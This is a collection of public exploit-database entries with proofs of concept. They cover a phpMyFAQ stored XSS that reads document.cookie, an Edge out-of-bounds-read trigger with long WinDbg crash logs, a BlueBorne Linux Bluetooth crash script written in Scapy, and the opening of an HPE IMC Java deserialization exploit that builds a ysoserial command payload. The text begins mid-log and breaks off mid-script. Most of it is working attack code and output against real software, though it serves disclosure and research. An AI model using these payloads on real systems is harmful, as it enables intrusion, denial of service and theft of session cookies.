40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14
41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:013> r
rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb
rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000
rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0
r8=0000000000000017 r9=000000ebc42f8e78 r10=00000fff53a47750
r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78
r14=000000ebc42f8e70 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> u 00007ffa`9d5f15ea
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx]
00007ffa`9d5f15ed 488b80d0050000 mov rax,qword ptr [rax+5D0h]
00007ffa`9d5f15f4 ff15c654ab00 call qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)]
=========================================
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42758.zip
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14618
1. Description
Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ
through 2.9.8 allows remote attackers to inject arbitrary web script or
HTML via the Questions field in an "Add New FAQ" action.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14618
https://securityprince.blogspot.fr/2017/10/cve-2017-14618-phpmyfaq-298-cross-site.html
2. Proof of Concept
Steps to Reproduce:
1. Open the affected link "
http://localhost/phpmyfaq/admin/?action=editentry" with logged in user
with administrator privileges
2. Enter the <a onmouseover=alert(document.cookie)>xss link</a> in the
“Questions”
3. Save the FAQ
4. Login using any other user or simply click on the phpMyFAQ on the
top-right hand side of the web portal
5. Click on the latest FAQ added
6. Hover around the name "xss link"
3. Solution:
This vulnerability will be fixed in phpMyFAQ 2.9.9
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1301
There is an out-of-bounds read issue in Microsoft Edge that could potentially be turned into remote code execution. The vulnerability has been confirmed on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) as well as Microsoft Edge 40.15063.0.0 (Microsoft EdgeHTML 15.15063).
PoC:
==========================================
-->
<!-- saved from url=(0014)about:internet -->
<script>
function go() {
select1.multiple = false;
var optgroup = document.createElement("optgroup");
select1.add(optgroup);
var options = select1.options;
select2 = document.createElement("select");
textarea.setSelectionRange(0,1000000);
select1.length = 2;
document.getElementsByTagName('option')[0].appendChild(textarea);
select1.multiple = true;
textarea.setSelectionRange(0,1000000);
document.execCommand("insertOrderedList", false);
select2.length = 100;
select2.add(optgroup);
//alert(options.length);
var test = options[4];
//alert(test);
}
</script>
<body onload=go()>
<textarea id="textarea"></textarea>
<select id="select1" contenteditable="true"></select>
<!--
=========================================
Preliminary analysis:
When opening the PoC in Edge under normal circumstances, the content process will occasionally crash somewhere inside Js::CustomExternalObject::GetItem (see Debug Log 1 below) which corresponds to 'var test = options[4];' line in the PoC. Note that multiple page refreshes are usually needed to get the crash.
The real cause of the crash can be seen if Page Heap is applied to the MicrosoftEdgeCP.exe process and MemGC is disabled with OverrideMemoryProtectionSetting=0 registry flag (otherwise Page Heap settings won't apply to the MemGC heap). In that case an out-of-bounds read can be reliably observed in COptionsCollectionCacheItem::GetAt function (see Debug Log 2 below). What happens is that Edge thinks 'options' array contains 102 elements (this can be verified by uncommenting 'alert(options.length);' line in the PoC), however in reality the Options cache buffer is going to be smaller and only contain 2 elements. Thus if an attacker requests an object that is past the end of the cache buffer (note: the offset is chosen by the attacker) an incorrect object may be returned which can potentially be turned into a remote code execution.
Note: Debug logs were obtained on an older version of Edge for which symbols were available. However I verified that the bug also affects the latest version.
Debug log 1:
=========================================
(1790.17bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000071`3ecfb090 00007ffa`c8dc0c92 chakra!Js::CrossSite::MarshalVar+0x37
01 00000071`3ecfb0c0 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x1c2
02 00000071`3ecfb1a0 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
03 00000071`3ecfb200 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
04 00000071`3ecfb290 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
05 00000071`3ecfb2f0 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
06 00000071`3ecfb380 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
07 00000071`3ecfb3c0 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
08 00000071`3ecfb450 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
09 00000071`3ecfb4b0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0a 00000071`3ecfb860 000001b7`d68e0fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0b 00000071`3ecfb8b0 00007ffa`c8e77273 0x000001b7`d68e0fb2
0c 00000071`3ecfb8e0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0d 00000071`3ecfb930 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0e 00000071`3ecfb990 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
0f 00000071`3ecfb9e0 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
10 00000071`3ecfba70 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
11 00000071`3ecfbad0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
12 00000071`3ecfbe20 000001b7`d68e0fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
13 00000071`3ecfbe70 00007ffa`c8e77273 0x000001b7`d68e0fba
14 00000071`3ecfbea0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
15 00000071`3ecfbef0 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
16 00000071`3ecfbf50 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
17 00000071`3ecfc040 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
18 00000071`3ecfc0b0 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
19 00000071`3ecfc150 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1a 00000071`3ecfc1e0 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1b 00000071`3ecfc280 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1c 00000071`3ecfc2d0 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1d 00000071`3ecfc310 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1e 00000071`3ecfc490 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
1f 00000071`3ecfc510 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
20 00000071`3ecfc670 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
21 00000071`3ecfc6a0 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
22 00000071`3ecfc970 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
23 00000071`3ecfc9c0 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
24 00000071`3ecfcad0 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
25 00000071`3ecfcb90 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
26 00000071`3ecfcbc0 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
27 00000071`3ecfd050 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
28 00000071`3ecfd150 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
29 00000071`3ecfd210 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2a 00000071`3ecfd370 00007ffa`c0cccdf1 user32!DispatchMessageWorker+0x1ac
2b 00000071`3ecfd3f0 00007ffa`c0ccc3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2c 00000071`3ecff640 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2d 00000071`3ecff760 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2e 00000071`3ecff790 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
2f 00000071`3ecff7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=00000001afccb7d4 rbx=000001b7d669fd80 rcx=ffff000000000000
rdx=00000001afccb7d4 rsi=000001afce6556d0 rdi=000000713ecfb250
rip=00007ffac8dc23f7 rsp=000000713ecfb090 rbp=000000713ecfb141
r8=0000000000000000 r9=000001b7d8a94bd0 r10=0000000000000005
r11=000001b7d9ebcee0 r12=0000000000000003 r13=0001000000000004
r14=0000000000000004 r15=000001afce6556d0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
=========================================
Debug log 2 (with Page Heap on for MicrosoftEdgeCP.exe and MemGC disabled):
=========================================
(de8.13c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000091`94ffb2c0 00007ffa`c9569bb2 edgehtml!COptionsCollectionCacheItem::GetAt+0x51
01 00000091`94ffb2f0 00007ffa`c8dc0c51 edgehtml!CElementCollectionTypeOperations::GetOwnItem+0x122
02 00000091`94ffb330 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x181
03 00000091`94ffb410 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
04 00000091`94ffb470 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
05 00000091`94ffb500 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
06 00000091`94ffb560 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
07 00000091`94ffb5f0 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
08 00000091`94ffb630 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
09 00000091`94ffb6c0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
0a 00000091`94ffb720 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0b 00000091`94ffbad0 000001b6`4f600fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 00000091`94ffbb20 00007ffa`c8e77273 0x000001b6`4f600fb2
0d 00000091`94ffbb50 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0e 00000091`94ffbba0 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 00000091`94ffbc00 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
10 00000091`94ffbc50 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
11 00000091`94ffbce0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
12 00000091`94ffbd40 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
13 00000091`94ffc090 000001b6`4f600fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
14 00000091`94ffc0e0 00007ffa`c8e77273 0x000001b6`4f600fba
15 00000091`94ffc110 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
16 00000091`94ffc160 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
17 00000091`94ffc1c0 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
18 00000091`94ffc2b0 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
19 00000091`94ffc320 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
1a 00000091`94ffc3c0 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1b 00000091`94ffc450 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1c 00000091`94ffc4f0 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1d 00000091`94ffc540 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1e 00000091`94ffc580 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1f 00000091`94ffc700 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
20 00000091`94ffc780 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
21 00000091`94ffc8e0 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
22 00000091`94ffc910 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
23 00000091`94ffcbe0 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
24 00000091`94ffcc30 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
25 00000091`94ffcd40 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
26 00000091`94ffce00 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
27 00000091`94ffce30 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
28 00000091`94ffd2c0 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
29 00000091`94ffd3c0 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
2a 00000091`94ffd480 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2b 00000091`94ffd5e0 00007ffa`c0d2cdf1 user32!DispatchMessageWorker+0x1ac
2c 00000091`94ffd660 00007ffa`c0d2c3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2d 00000091`94fff8b0 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2e 00000091`94fff9d0 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2f 00000091`94fffa00 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
30 00000091`94fffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=000001b652742fe0 rbx=0000000000000004 rcx=000001b64f877f30
rdx=0000000000000004 rsi=0000000000000000 rdi=000001b651ecffd0
rip=00007ffac96b1581 rsp=0000009194ffb2c0 rbp=000001b64f3bcc60
r8=0000000000000005 r9=000001b651ed9e50 r10=0000000000000005
r11=000001b65343ef20 r12=0000009194ffb370 r13=0001000000000004
r14=0000000000000000 r15=0000000000000004
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> !heap -p -a 000001b6`52742ff0
address 000001b652742ff0 found in
_DPH_HEAP_ROOT @ 1ae3fae1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1b652a5fd68: 1b652742fe0 20 - 1b652742000 2000
00007ffae783fd99 ntdll!RtlDebugAllocateHeap+0x000000000003bf65
00007ffae782db7c ntdll!RtlpAllocateHeap+0x0000000000083fbc
00007ffae77a8097 ntdll!RtlpAllocateHeapInternal+0x0000000000000727
00007ffac9958547 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x0000000000010457
00007ffac96d1483 edgehtml!CImplAry::EnsureSizeWorker+0x0000000000000093
00007ffac9882261 edgehtml!CImplPtrAry::Append+0x0000000000000051
00007ffac9589543 edgehtml!CSelectElement::AppendOption+0x000000000000002f
00007ffac95892e1 edgehtml!CSelectElement::BuildOptionsCache+0x00000000000000e1
00007ffac9e7f044 edgehtml!CSelectElement::Morph+0x00000000000000d0
00007ffac9a4e7cf edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x00000000001066df
00007ffac9605f85 edgehtml!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x0000000000000255
00007ffac9605d23 edgehtml!NUMPROPPARAMS::SetNumberProperty+0x000000000000003b
00007ffac9605bda edgehtml!CBase::put_BoolHelper+0x000000000000004a
00007ffac9c6f1d1 edgehtml!CFastDOM::CHTMLSelectElement::Trampoline_Set_multiple+0x000000000000013d
00007ffac9916b55 edgehtml!CFastDOM::CHTMLSelectElement::Profiler_Set_multiple+0x0000000000000025
00007ffac8ce6d07 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000000000000177
00007ffac8dc2640 chakra!Js::LeaveScriptObject<1,1,0>::LeaveScriptObject<1,1,0>+0x0000000000000180
00007ffac8e62209 chakra!Js::JavascriptOperators::CallSetter+0x00000000000000a9
00007ffac8de7151 chakra!Js::CacheOperators::TrySetProperty<1,1,1,1,1,1,0,1>+0x00000000000002d1
00007ffac8de6ce6 chakra!Js::ProfilingHelpers::ProfiledStFld<0>+0x00000000000000d6
00007ffac8d89a70 chakra!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutT_ElementCP<Js::LayoutSizePolicy<0> > const >+0x0000000000000070
00007ffac8d8e800 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000340
00007ffac8d8c852 chakra!Js::InterpreterStackFrame::Process+0x0000000000000142
00007ffac8d90920 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x00000000000004a0
00007ffac8d92065 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x0000000000000055
000001b64f600fb2 +0x000001b64f600fb2
=========================================
-->
# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -
DoS (Crash) only
# Date: 09/21/2017
# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com>
# Version: Kernel version v3.3-rc1, and thus affects all version from there on
# Tested on: Linux 4.4.0-93-generic #116
# CVE : CVE-2017-1000251
# Provided for legal security research and testing purposes ONLY.
Proof of Concept - Crash Only - Unarmed/Unweaponized/No Payload
After reading tons of Documentation and Protocol specifications.
1) Install Scapy
https://github.com/secdev/scapy
Add/Replace these requests and responses in Bluetooth Protocol stack to these:
scapy/layers/bluetooth.py
class L2CAP_ConfReq(Packet):
name = "L2CAP Conf Req"
fields_desc = [ LEShortField("dcid",0),
LEShortField("flags",0),
ByteField("type",0),
ByteField("length",0),
ByteField("identifier",0),
ByteField("servicetype",0),
LEShortField("sdusize",0),
LEIntField("sduarrtime",0),
LEIntField("accesslat",0),
LEIntField("flushtime",0),
]
class L2CAP_ConfResp(Packet):
name = "L2CAP Conf Resp"
fields_desc = [ LEShortField("scid",0),
LEShortField("flags",0),
LEShortField("result",0),
ByteField("type0",0),
ByteField("length0",0),
LEShortField("option0",0),
ByteField("type1",0),
ByteField("length1",0),
LEShortField("option1",0),
ByteField("type2",0),
ByteField("length2",0),
LEShortField("option2",0),
ByteField("type3",0),
ByteField("length3",0),
LEShortField("option3",0),
ByteField("type4",0),
ByteField("length4",0),
LEShortField("option4",0),
ByteField("type5",0),
ByteField("length5",0),
LEShortField("option5",0),
ByteField("type6",0),
ByteField("length6",0),
LEShortField("option6",0),
ByteField("type7",0),
ByteField("length7",0),
LEShortField("option7",0),
ByteField("type8",0),
ByteField("length8",0),
LEShortField("option8",0),
ByteField("type9",0),
ByteField("length9",0),
LEShortField("option9",0),
ByteField("type10",0),
ByteField("length10",0),
LEShortField("option10",0),
ByteField("type11",0),
ByteField("length11",0),
LEShortField("option11",0),
ByteField("type12",0),
ByteField("length12",0),
LEShortField("option12",0),
ByteField("type13",0),
ByteField("length13",0),
LEShortField("option13",0),
ByteField("type14",0),
ByteField("length14",0),
LEShortField("option14",0),
ByteField("type15",0),
ByteField("length15",0),
LEShortField("option15",0),
ByteField("type16",0),
ByteField("length16",0),
LEShortField("option16",0),
ByteField("type17",0),
ByteField("length17",0),
LEShortField("option17",0),
ByteField("type18",0),
ByteField("length18",0),
LEShortField("option18",0),
ByteField("type19",0),
ByteField("length19",0),
LEShortField("option19",0),
ByteField("type20",0),
ByteField("length20",0),
LEShortField("option20",0),
ByteField("type21",0),
ByteField("length21",0),
LEShortField("option21",0),
ByteField("type22",0),
ByteField("length22",0),
LEShortField("option22",0),
ByteField("type23",0),
ByteField("length23",0),
LEShortField("option23",0),
ByteField("type24",0),
ByteField("length24",0),
LEShortField("option24",0),
ByteField("type25",0),
ByteField("length25",0),
LEShortField("option25",0),
ByteField("type26",0),
ByteField("length26",0),
LEShortField("option26",0),
ByteField("type27",0),
ByteField("length27",0),
LEShortField("option27",0),
ByteField("type28",0),
ByteField("length28",0),
LEShortField("option28",0),
ByteField("type29",0),
ByteField("length29",0),
LEShortField("option29",0),
ByteField("type30",0),
ByteField("length30",0),
LEShortField("option30",0),
ByteField("type31",0),
ByteField("length31",0),
LEShortField("option31",0),
ByteField("type32",0),
ByteField("length32",0),
LEShortField("option32",0),
ByteField("type33",0),
ByteField("length33",0),
LEShortField("option33",0),
ByteField("type34",0),
ByteField("length34",0),
LEShortField("option34",0),
ByteField("type35",0),
ByteField("length35",0),
LEShortField("option35",0),
ByteField("type36",0),
ByteField("length36",0),
LEShortField("option36",0),
ByteField("type37",0),
ByteField("length37",0),
LEShortField("option37",0),
ByteField("type38",0),
ByteField("length38",0),
LEShortField("option38",0),
ByteField("type39",0),
ByteField("length39",0),
LEShortField("option39",0),
ByteField("type40",0),
ByteField("length40",0),
LEShortField("option40",0),
ByteField("type41",0),
ByteField("length41",0),
LEShortField("option41",0),
ByteField("type42",0),
ByteField("length42",0),
LEShortField("option42",0),
ByteField("type43",0),
ByteField("length43",0),
LEShortField("option43",0),
ByteField("type44",0),
ByteField("length44",0),
LEShortField("option44",0),
ByteField("type45",0),
ByteField("length45",0),
LEShortField("option45",0),
ByteField("type46",0),
ByteField("length46",0),
LEShortField("option46",0),
ByteField("type47",0),
ByteField("length47",0),
LEShortField("option47",0),
ByteField("type48",0),
ByteField("length48",0),
LEShortField("option48",0),
ByteField("type49",0),
ByteField("length49",0),
LEShortField("option49",0),
ByteField("type50",0),
ByteField("length50",0),
LEShortField("option50",0),
ByteField("type51",0),
ByteField("length51",0),
LEShortField("option51",0),
ByteField("type52",0),
ByteField("length52",0),
LEShortField("option52",0),
ByteField("type53",0),
ByteField("length53",0),
LEShortField("option53",0),
ByteField("type54",0),
ByteField("length54",0),
LEShortField("option54",0),
ByteField("type55",0),
ByteField("length55",0),
LEShortField("option55",0),
ByteField("type56",0),
ByteField("length56",0),
LEShortField("option56",0),
ByteField("type57",0),
ByteField("length57",0),
LEShortField("option57",0),
ByteField("type58",0),
ByteField("length58",0),
LEShortField("option58",0),
ByteField("type59",0),
ByteField("length59",0),
LEShortField("option59",0),
ByteField("type60",0),
ByteField("length60",0),
LEShortField("option60",0),
ByteField("type61",0),
ByteField("length61",0),
LEShortField("option61",0),
ByteField("type62",0),
ByteField("length62",0),
LEShortField("option62",0),
ByteField("type63",0),
ByteField("length63",0),
LEShortField("option63",0),
ByteField("type64",0),
ByteField("length64",0),
LEShortField("option64",0),
ByteField("type65",0),
ByteField("length65",0),
LEShortField("option65",0),
ByteField("type66",0),
ByteField("length66",0),
LEShortField("option66",0),
ByteField("type67",0),
ByteField("length67",0),
LEShortField("option67",0),
ByteField("type68",0),
ByteField("length68",0),
LEShortField("option68",0),
ByteField("type69",0),
ByteField("length69",0),
LEShortField("option69",0),
]
2) Exploit
bluebornexploit.py
------------------------
from scapy.all import *
pkt = L2CAP_CmdHdr(code=4)/
L2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)
pkt1 = L2CAP_CmdHdr(code=5)/
L2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)
bt = BluetoothL2CAPSocket("00:1A:7D:DA:71:13")
bt.send(pkt)
bt.send(pkt1)
bluetoothsrv.py
--------------------
from scapy.all import *
bt = BluetoothL2CAPSocket("01:02:03:04:05:06")
bt.recv()
DEMO:
https://imgur.com/a/zcvLb
#!/usr/bin/env python
########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""
def printUsage () :
print "......................................................................................................................"
print "."
print ". HPE/H3C - IMC Java Deserialization Exploit"
print "."
print ". Example 1: -payload-binary"
print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
